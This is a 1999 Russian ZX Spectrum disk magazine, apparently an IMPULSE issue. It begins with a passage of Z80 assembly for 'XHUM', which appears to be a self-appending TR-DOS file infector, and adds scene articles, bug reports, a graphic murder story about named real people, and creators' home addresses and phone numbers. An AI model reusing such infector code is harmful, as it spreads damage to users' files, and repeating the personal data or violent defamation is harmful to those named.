FIND POP AF ;(SP)>AF, SP+2>SP"
LD A,(HL) ;(HL)>A"
POP DE ;(SP)>DE, SP+2>SP"
AND A ;A AND A>A"
JR Z,EXIT ;EXIT>PC if Z
PUSH DE ;SP-2>SP, DE>(SP)
LD DE,#0004 ;#0004>DE
ADD HL,DE ;HL+DE>HL
ADD HL,DE ;HL+DE>HL
LD A,(HL) ;(HL)>A
INC HL ;HL+1>HL
LD C,(HL) ;(HL)>C
PUSH HL ;SP-2>SP, HL>(SP)
INC HL ;HL+1>HL
LD B,(HL) ;(HL)>B
ADD HL,DE ;HL+DE>HL
LD E,(HL) ;(HL)>E
INC HL ;HL+1>HL
LD D,(HL) ;(HL)>D
INC HL ;HL+1>HL
CP B ;A=B
JR NZ,FIND ;FIND>PC if NZ
LD A,C ;C>A
CP #FD-LEN ;A-#FD+LEN
JR NC,FIND ;FIND>PC if NC
POP HL ;(SP)>HL, SP+2>SP
ADD A,LEN ;A+LEN>A
LD (HL),A ;A>(HL)
LD HL,#DD3B ;#DD3B>HL
PUSH BC ;SP-2>SP, BC>(SP)
PUSH DE ;SP-2>SP, DE>(SP)
PUSH HL ;SP-2>SP, HL>(SP)
PUSH BC ;SP-2>SP, BC>(SP)
PUSH BC ;SP-2>SP, BC>(SP)
PUSH HL ;SP-2>SP, HL>(SP)
INC B ;B+1>B
LD C,#05 ;#05>C
CALL #3D13 ;SP-2>SP, PC>(SP)
;#3D13>PC
POP HL ;(SP)>HL, SP+2>SP
POP BC ;(SP)>BC, SP+2>SP
ADD HL,BC ;HL+BC>HL
PUSH HL ;SP-2>SP, HL>(SP)
PUSH HL ;SP-2>SP, HL>(SP)
EX DE,HL ;DE<>HL
LD HL,LEN ;LEN>HL
PUSH HL ;SP-2>SP, HL>(SP)
ADD HL,DE ;HL+DE>HL
EX DE,HL ;DE<>HL
LDIR ;(HL)>(DE)<----- ;HL+1>HL,DE+1>DE¦ ;BC-1>BC, BC>0?--
POP BC ;(SP)>BC, SP+2>SP
POP DE ;(SP)>DE, SP+2>SP
EX AF,AF' ;AF<>AF
PUSH AF ;SP-2>SP, AF>(SP)
POP HL ;(SP)>HL, SP+2>SP
DEC HL ;HL-1>HL
LDIR ;(HL)>(DE)<----- ;HL+1>HL,DE+1>DE¦ ;BC-1>BC, BC>0?--"
POP DE ;(SP)>DE, SP+2>SP
POP BC ;(SP)>BC, SP+2>SP
LD H,D ;D>H
LD L,E ;E>L
RES #07,D ;#00>D(#07)
LD A,#3D ;#3D>A
CPDR ;-->A=(HL)------ ;¦HL+1>HL,BC-1>BC ;LBC>0? ¦"
ADD A,(HL) ;(HL)>A<---------
CP #50 ;A-#50
JR NZ,SAVE ;SAVE>PC if NZ
LD (HL),E ;E>(HL)
INC HL ;HL+1>HL
LD (HL),D ;D>(HL"
SAVE POP HL ;(SP)>HL, SP+2>SP
POP DE ;(SP)>DE, SP+2>SP
POP BC ;(SP)>BC, SP+2>SP
INC B ;B+1>B
LD C,#06 ;#06>C
CALL #3D13 ;SP-2>SP, PC>(SP)
;#3D13>PC
EXIT POP HL ;(SP)>HL, SP+2>SP
LD DE,#0000 ;#0000>DE
LD BC,#0906 ;#0906>BC
CALL #3D13 ;SP-2>SP, PC>(SP) ;#3D13>PC
EXX ;BC<>BC', DE<>DE ;HL<>HL
JP #3D13 ;#3D13>PC"
Наверное, все на этот раз. Попробуйте обрезать мой код
хотя бы на 1 байт без утери функциональных возможностей XHUMа, и если у Вас
это получится, то звякните мне
как-нибудь.
ПРЕМЬЕРА СЕЗОНА - MONSTER 4 JUDGMENT
DAY
(C) БУЛЬБЯШ
..Пальцы моих ног мяли и тискали ее. Клава лежала на полу и ей было уже все
равно - она не чувствовала боли. Лишь слабый хрип, доносившийся из ее открытого
динамика, давал знать, что она еще жива, что источник моего удовольствия еще
существует. Да, я знал это и хотел новых, ранее не испытываемых ощущений. Я
хотел показать Клаве, что значит чувствовать власть над тобой. И я обрушил на
нее всю мощь своих тайных желаний...
Даже труп не выдержал бы моего натиска - Клава изогнулась и затрещала так, словно
хотела отказать мне. Ее поведение взбесило меня и дальше за свои поступки я
уже не отвечал...
* * *
Сейчас, когда настал судный день, я понял, что глубоко
погряз в том дерьме! И я готов онести наказание, каким бы суровым оно не было.
Какой глупостью было напиться в тот вечер, 3 месяца назад. Да, тогда я был пьян!...
" А когда я пьян, я становлюсь МОНСТРОМ!..."""
БУЛЬБЯШ/IPKL
Итак, INKOGNITO снова радо вас видеть. Обещанный полтора
года назад MONSTER 4 наконец-то завершен. Несмотря на все невзгоды и трудности,
мы сделали его, и вся наша ненависть и злоба воплотилась в нем. Трудно сказать,
сколько бессонных ночей было проведено за бутылкой водки и пачкой сигарет в
поисках идей и их решений, но все это уже позади и теперь вы можете лицезреть
плоды наших стараний. Только не надо думать, что все эти полтора года мы всего
лишь писали наш монстр. Нет, все это время мы жили и существовали как все обыкновенные
люди и лишь в последний месяц решили реализовать себя. INKOGNITO надеется, что
не ошибется, если назовет свое дитя продуктом сезона - ведь это именно так.
И мы надеемся, что вы не разочаруетесь, посмотрев монстр, ведь это 200 КБ сэмплов,
приятного дигитала (как на AY, так и на COVOX'е и SOUNDRIV'е), прекрасной графики
и интерруптной музыки, и, конечно, довольно неплохого кодинга. А для любителей
искать секреты и находить их есть возможность попробовать отыскать нашу HIDDEN
PART, в кото-
рой мы расскажем вам, кто же такие на самом деле INKOGNITO. Ищите MONSTER 4
и юбуйтесь им - возможно не самым популярным продуктом сезона, но, поверьте,
самым скандальным - это точно. Удачи тебе, грязный мазафакер !!!
ОТКУДА
БЕРУТСЯ ГЛЮКАВЫЕ ПРОГРАММЫ?
(C) IMPERIO
От REALa. И не стоит воспринимать эту фразу как оскорбление, унижение и опущение.
Я глубоко уважаю REALа/RS, восхищаюсь его безграничным талантом, преклоняюсь
перед его эрудицией, находчивостью и мужественностью. Но я хочу через IMPLUSE
обратить внимание REALа на глюки в некоторых его прогах, т.к. голос он воспринимает
не шибко хорошо, а,
надеюсь, после публикации этой статеечки он воспримет мои замечания серьезно.
Итак, что мы имеем на сегодняшний день из заглюченых работ REALа:
REAL COMMANDER v1.6
Последняя версия знаменитого командера. Много было его
версий, много в них было
глюков и, казалось бы,в 1.6 не должно было быть ни одного оного. Но нет, и здесь
при
тщательном тестировании было обнаружено довольно большое кол-во багов, которые
почему-то не были выявлены и исправлены до выпуска этого продукта. Я не хочу
говорить
ничего плохого об RC, я сам всегда им пользуюсь, начиная от 1.0 версии, но глюки
они и в Африке глюки. Я хочу обратить Ваше внимание на следующие неприятные
вещи, наблюдающиеся в командере:
1. Если при
открытии RAM диска на запрос об кол-ве открываемых банков в любой системе (Dec,
Hex, Bin) ввести ZERO, то мы сможем наблюдать (независимо от конфигурации) форматтирование
256 банков спектрума, что составляет 256*16=4096К. Неплохо для моего 128го спекки!
Жаль только, что где-то на 170 банке все это дело вытворяет AutoReset.
2. Next глюк проявляется вообще хитрым образом: зайдем в доктор и, находясь
в оном, сделаем SAVE SECTOR, сделав перед этим из своего диска READ ONLY. После
чего безжалостно ответить INGNORE на сообщение об соответствующей ошибке...
Ну как? А чего
это перед глазами эта самая таблычка осталась - она же работать мешает!
3. Нет, не надо выходить из доктора. Если получится, то можно провести эксперимент
по нахождению следующего электронного жучка в RC. Суть его состоит в том, что
при поиске необходимой строки в необьятных просторах Вашего диска RC ищет информацию
потреково. Отсюда следует, что если в конце трека RC находит,предположим, один
первый символ из строки поиска, то ему плевать будет на то, что в следующем
треке будет совсем не
тот кусок, который Вам необходим - поиск быстренько прервется и RC будет всем
своим
кодом насмехаться над тем, как он на.бал очередную жертву.
4. Откроем RAM диск на n-ное кол-во банков, дабы создать эмуляцию работы с писишным
винчестером. Теперь подвергнем его небольшому "насилию", что, собственно говоря,
не необходимо. После, находясь на RAM диске, надавим на "R" для закрытия RAMа
и в меню выбора дисковода надавим на EDIT. Как результат мы получили доступ
к секретной информации, которую мы только что уничтожили, но которая, как ни
странно, прекрасно сохранилась и неплохо подвергается изменению на закрытом
RAM диске. Правда до того времени, пока мы не перейдем на другой диск.
5. Итак, RC считает, что RAM диск безвозвратно закрыт и до поры до времени недоступен
- теперь настала пора насладиться самым большим багом, который даже багом назвать
нельзя - это нечто огромное и прикольное. Суть этого огромного и прикольного
состоит в том, что
теперь RAM диск воспринимается как некий виртуальный диск с 256 (!) треками.
И теперь появилась:
!!! СУПЕР ВОЗМОЖНОСТЬ ИЗМЕНИТЬ RC ИЗ САМОГО СЕБЯ! Это значит, что если сейчас
зайти на якобы несуществующем RAM диске где-то на 60 трек, то можно будет вполне
реально покопаться в работающем сейчас RC: изменить тексты, пообнулять его куски.
Возможно это не глюк, возможно все это было предусмотрено REALом и предназначалось
для членов REAL SOFTWARE, как скрытый и таинственный дебаггер, но страшная тайна
раскрыта и не имеет смысла молчать.
+ В RC есть еще несколько багов с RAM диском и др., но они настолько маленькие
и так медленно ползают, что нет необходимости обращать на них внимание - они
безобидны.
ECHO 5
Я не буду обсуждать так любимую REALом волосатую лапу
с золотым "Роллексом", я лишь обращу внимание на экзотический глючок, который
нашел некий народ из ex-USSR, доложил об этом самому REALу, а уж он продемонстрировал
его мне. К сожалению, этот насекомус не доступен тем, у кого не имеется в наличии
такого девайса, как KEMPSTON MOUSE, либо эмулятора с ее поддержкой. Никому в
голову не приходило рулиться в ECHO #5 мышкой,
давя при этом на какой-нибудь CAPS SHIFT или другие баттоны из этого семейства?
А Вы попробуйте и увидите на своем мониторе нечто тааакое (!) загадочное...
TEXT FORMAT v1.5
Прога для форматтирования текстов. Как писал REAL - она
обрабатывает тексты с нереальной скоростью, чуть ли не приближенной к скорости
света, расставляя не только
пробелы, но еще и переносы. Не буду спорить, все это так и есть, но какого хрена
из 50% текстов TF делает какое-то дерьмо, которе потом приходится вручную форматтировать
самому, т.к. отбивает всякое желание еще раз прогонять текст через TF. Почему
тот же ZX WORD форматтирует все отлично, хоть и проигрывет TFу в скорости? А
может TF действует по RND, форматтируя одни тексты нормально, а другие в стиле,
чем-то напоминающем "елочку" или "лесенку" ? Появляется желание загрузить RC
1.6 (см. выше) и стереть TF с диска, после чего тот подвернуть кипячению и дезинфекции!...
Мне уже так надоело распинаться тут про REALовские глюки
- я и так обсуждаю их с народом каждый день, а вот сейчас и написал еще. Что
касается остальных прог, выпущенных RS, то могу обратить внимание только на
заинтрованные геймы, каждая из которых в какой-то мере заглючена. Ну, в принципе,
и все. Не буду говорить о недостатках софта REALа - недостатки есть у каждого,
даже у POWER HACKERZ ALLIANCE.
Еще раз надеюсь, что REAL обратит внимание на написанное выше и в будущем,перед
выпуском своего очередного продукта, будет подвергать его тщательному тестированию
-
нам не нужны новые глюки!
Недавно, мне в почту опустили 5.25 дискету. После исследования дискеты мне удалось найти мне 10 версий нижеизложенного текста, весь магнитный слой дискеты был исписан маркером надписью "FOR IMPULSE PUBLICATION"... Ну что-же, IMPULSE газета общая и независимая, в ней имеет право на жизнь даже самые убогие тексты.... Хотя текстик оказался вполне прикольным, но автор назвал себя просто "Mister X". Возможно это Mister Хедгехог, кто знает...
Рассказ основан на реальных событиях, которые происходили в реальном времени,
в реальном месте и с реальными персонажами.
Ночь... Темная-темная ночь и вокруг темнота. Кажется, что все темные силы устремились
сегодня на землю, что-бы начать грандиозный шабаш. Как обычно, на часах 12,
пятница 13 и,
конечно-же, полнолуние. Вдалеке слышался вой собак, из-за которого по телу пробегала
мелкая дрожь и становилось не по себе, и именно в эту ночь REAL'у пришлось стоять
на своем трудном, но почетном посту...
Он сидел на кривом стуле, с силой сжимая в руках обрез когда-то новой двустволки.
Шапка-ушанка неуклюже съехала на затылок, но поправлять ее REAL не спешил -
его внимание было целиком поглощено этими криками, которыми был заполнен внутренний
дворик здания,охрану которого бдительно нес REAL.Очко онемело,пришлось погладить
его, чтобы оно снова смогло выполнять свои обязанности.
Было холодно - около -25 градусов. Здание не отапливалось, недалеко стояла эл.печь
сверкая 5-ю оранжевыми горизонтальными полосками. Пододвинуть ее ближе не позволял
шнур, а стул был приколочен к полу (шоб не вкрали). И приходилось REAL'у мерзнуть.
Наконец бачок его терпения не выдержал:
- Убььью Суки !!! Вашу мать!!!
С этими словами он схватил свой SUPER SHOTGUN BELINEA, надел оранжевый строительный
шлем и, выбежав на улицу, стал беспорядочно палить по ламерам, которые играли
в снежки перед стройкой. Так как зрения REAL'у упорно не хватало, снаряды не
попадали в цель. Он одбежал к перепуганным детишкам и, схватив одного за шиворот,направил
дуло ружья в глаз. После этого он нажал AUTOFIRE...
Текущий ход дела представить было нетрудно - с проклятиями он отбросил от себя
остатки чьей-то головы.И только тогда он понял, что он натворил."Сначала нужно
избавиться от нежелательных свидетелей"-подумал он. А в живых остался только
один. REAL схватил его в охапку и потащил к себе в будку, по пути не забыв прихватить
монтировку.
Не
будем подробно рассказывать вам, что же происходило в будке. Давайте немного
перескочим вперед. Расчлененные трупы оттягивали плечо, которое ныло и просилось
в отставку. Время было уже позднее, а он тащил и тащил, не взирая ни на что.
Путь его был ясен - он нес все это дело к его старому корешу - MR.HEDGEHOG'у,
который жил недалеко
от этого кровавого места. HEDGE спал, и не мудрено - на часах уже было около
часа ночи.
Дверь открыл дед, который с угрозами сразу же накинулся на REAL'а: "мол ходют
тут разные глючные". За свои слова старый дед получил в нос кирзачем и только
после этого замолк.
Правда этот кирзач еще походил по лежавшему на полу телу деда. Схватив в руки кота, REAL стал энергично стирать с сапогов дедушкину кровь - она оказалась довольно въедливой жидкостью.
После этого он гордо прошагал по HOG'овской квартире, по пути пряча наиболее
понравившиеся вещи в карман. Мешок с трупами он поставил на пианино. Постучавшись
в дверь HOG'а, он хилым ударом ноги снес ее с петель. Хог удивленно стоял перед
REAL'ом в
трусах.
- A, PAWEL, здоров. - сказал он REAL'у, протягивая ему
руку.
- Не время сейчас здороваться. У меня трупы там завонялись.
- Какие трупы ?
- Да ламеров там двоих, пытались меня грохнуть.
- А, значит ты их в целях самообороны, да ?
- Да, да.
- Блин, а где они лежат ?
- Да вот, на рояле валяются.
- Ты че, охерел !!! Нахрен они мне в хате нужны !!!
- Да ладно, ты. Слышь, схорониться мне надо.
- Ты чо, у меня семья, дети !
- Ну это дело поправимое. - сказал REAL, доставая из-за
пояса здоровенный тесак, который он с ловкостью лягушки воткнул в мягкое, молодое
тело HOG'а.
- За что ?! - прохрипел HOG.
- За все хорошее. - ответил REAL, опытно поворачивая тесак
по часовой стрелке, наматывая на него кишки и вены когда-то живого HOG'а...
CIENG DALSZY NASTOMPI...
P.S.: Вот такой рассказик предоставил нам один человек.
Возможно он не отвечает моральным принципам некоторых читателей - ну что же,
не надо было тогда его читать:)
----------------------------------------------------------------
++++++ UL7RA HA(KeRS АLL!An(Е (HACKERS GROUP) ++++++
----------------------------------------------------------------
СООБЩАЕТ О ВРЕМЕННОМ ПЕРЕНОСЕ ОФИСА В СВЯЗИ С ПЕРЕХОДОМ
ХОЗЯИНА ОФИСА НА ДРУГИЕ ПЛАТФОРМЫ. В ЧАСТНОСТИ, ОН МЕНЯЕТ:
+ SPECCY на АКМ
+ ботинки на сапоги
+ бульбу на перлуху
+ носки на портянки
+ куртку на CHANNEL'ку
Так что просьба не звонить по телефону
8+(0162)+227-912 с 11 декабря 1998 года...
Теперь наш телефон таков: 8+(0162)+414+863 (Павел (морозов):).
------------------------------------------------
REALSOFTWARE CREATIVE POSSE
Для нас нет ничего нереального !!!
Мы готовы с вами
сотрудничать !
Запиши телефон нашего лидера:(0162) 256-276
Спешите!!! Очень скоро выйдет авторская коллекция от REAL
SOFTWARE. Колличество
копий ограничено, по ним разыгрывается безпроигрышная экспресс-лотерея, по которой
Вы сможете выиграть кучу нового, реального софта !!! Такая возможность дается
не каждый день. Самое высокое качество, самые низкие цены ! На каждую копию
дается пожизненная гарантия (физически испорченый диск не меняем). Вот краткий
список того, что войдет в эту
коллекцию:
Безусловно, в коллекцию войдет хит летнего сезона 1998
года - стратегическая игра с помесью тактического симулятора TECHNODROM 1.5.
Эта игра погрузит Вас в удивительный и коварный мир сражений, заставит в бешенном
ритме работать Ваши клетки головного мозга, лишь с этой игрой Вы забудете обо
всем. Отличная графика, превосходная музыка, оригинальный интерфейс и мощный
ИИ - вот все те преимущества, которые отличают ее от игр подобного типа.
PASSWORD PROTECT FILE ALGORITM - первая программа-шифровщик
на спекки! В ней
применен самый сложный алогоритм. Чем то он похож на алгоритм знаменитого
математика Шарля Де Битерле (1893-1964), но нами внесены некоторые принципильные
изменения, из-за чего информация практически не поддается декодированию.
REAL COMMANDER ver 1.7 - самая лучшая файл-оболочка,
написанная на спектруме. Здесь Вы сможете отформатировать диск (AMD copIer,
Эм.Шалаева), послушать качественную музыку в формате DOLBY SURRОUND (стерео),
просмотреть текстовые файлы от ZX-word'а, запустить BAT файлы !
ТEXT FORMAT - утилита для форматтирования текстов,
ею пользуются в газетах "Вечерний Брест" и "Брестский курьер", а это уже многое
говорит.
REAL WORD EDIТOR - самый навороченный и быстрый
текстовый редктор. Поддерживает
расширенные макрос-комманды, что вообще на спектруме большая редкость. Также
есть
довольно большой набор флэш-инструкций и локальных меток. Есть поддержка цветов,
в
строке 42 символа.
SGEN ver 5.0 - новейший программируемый кросс-спрайт ассемблер. Такого
точно на
спектруме не было. Программа все делает за Вас: сама вырезает, сама создает
маску,
сама корректирует спрайты. Жаль вот только что вязать и шить не умеет...
Эти программы - лишь малая толика выпущенного нами софта, Вас ожидают горы наших
программ. Внимание !!! В связи с коммерческой ценностью продукции диск будет
защищен
новой защитой, которая не имеет аналогов на спектруме. Покупайте программное
обеспечение от REAL SOFTWARE только с фирменным логотипом и мультимедийным световым
значком.
----------------------------------------------------------------
CAPTAIN PAWEL/RS: Продаю CDOS-модемы, оптом от 100 шт.
на 66% дешевле !
тел.в Бресте: 2+5+6+2+7+6 (позвать Павла)!
----------------------------------------------------------------
Лаборатория им.DARKMAX'а приглашает Вас посетить наш офис!
Мы специализируемся на
различных аппаратных довесках к Вашему спекки: припаяем CDOS-модем, изготовим
кнопку выключение звука на Вашем динамике, просверлим дырку и установим в Ваш
спекки светодиод 'POWER ON'.
А еще:
128K ....................... 25$
AY CHIP .................... 10$
SHADOW RAM ................. 15$
PC-KLAVA CONTROLLER ........ 15$
На все предоставляеться гарантия,
ночью (темной) дешевле чем днем !!! Звони-
те по телефону: (0162) 23-97-05 (Макс).
(C) DELTA / IMPERIO
Вот ты и добрался до последней части нашего увлекательного
издания. Эту часть можно сравнить с последним глотком хорошего пива, но ты должен
понять, что все хорошее когда-нибудь, да и заканчивается. Мы надеемся, что ты
получил максимальное моральное удовлетворение (для кого-нибудь может и физическое).
Возможно наш стиль газеты и не
соответствует твоим моральным принципам и устоям, возможно... Мы вложили в эту
газету ну просто неимоверное колличество труда и сил, мы работали не покладая
рук в течении 7 месяцев для того, чтобы ты смог лицезреть на своем экране этот
шедевр. Конечно, ты просто обязан понять нас и догадаться что то, что мы сделали-бесценно
(в самом лучшем значении этого слова), но кризис в России очень сильно ударил
по нашим и без того "тощим" кошелькам. Мы предлагаем тебе окупить производственные
затраты :
2 Колонки + один низкочастотный динамик (7$+100000); это
для того, чтобы мы смогли ремиксить" этот прекрасный музак, которым ты сейчас
наслаждаешься.
1 стабилитрон КС162 (20000) для вылетевшего усилка.
1 3'5 дисковод SAMSUNG (17$) для склеивания IMPULSE.
1 5'25 дисковод (5$) для IMPERIO.
20 3'5 дискет(8$)для хранения статеек.
31 бутылка пива 0.5 (одна 25000) и 68 литров разлива (1=22е3), отдавать можно
и пивом (бутылочным).
" 1 Куртка свиная (170$); это для того," чтобы IMPERIO не отморозил ИИ, когда
таскал мне материалы.
Итого : 5+7+8+17+170=207 багсов и 775+1496+100+20=2391 кг зайцев (можно реальными
зайцами).
Прибавь еще расходы на еду (300$); это для того, чтобы
стимулировать наш бесценный мозг ценными витаминами (икра заморская полупрофессиональная).
Короче, с тебя челове 502 багса и 2 лимона 391 тыщ. Огромная просьба: данную
сумму высылать только переводом (никаких конвертов). Толко учти чувак, мы включили
счетчик...
ЭТО ЧУДО СОТВОРИЛИ :
Самый главный был :
DELTA\PHG\PHD\MSA ! AKA Мелинюк Олег, кОтОрЫй нАпИсАл
вСю интерРЕПУ, а также
около 51% текста. Автор всей графики (включая и псевдографику). Занимался написанием
многочисленных утилит для работы с текстами. Потратил большое колличество времени
на раскраску текста. Также автор многочисленных ошибок и очепяток. Хммм, пожалуй
это лишнее.
А также в роли ужасно главного был :
IMPERIO\PHG\PHD\ME
! AKA Демчук Павел, КоТоРоМу И сТуКнУлА в ИИ иДеЯ вЫпУсТиТь
эТо пОлУпРоФеСсИоНаЛьНоЕ нЕпЕчАтНоЕ иЗдАнИе. Набил около 49% текста. Когда-то
был
главным корректором.
Muzachka K0mp0z!70r :
MUZAFAR/ADIA/NHG/dY\aM0-BrE$7
Как с нами связаться :
Телефон : (8+0162) 41-48-63 (ПаВлИк)
Адрес (для 507$ и почты (не цифровой)) :
РБ, мегаполис Брест 224028, Гаврилова 26-30 Демчуку Павлу
Геннадьевичу.
FIDO'шный адрес :
2:454/7.120@FidoNet Pavel Demchuk
Адрес для наездов и факов :
2:454/11.25@FidoNet pAWEL cKysliack
СЮДА МОЖЕТЕ НЕ СЛАТЬ :(
2:454/5526.ArmyNet Oleg Meliniuk(ДВ)
Дата выхода: 25.02.99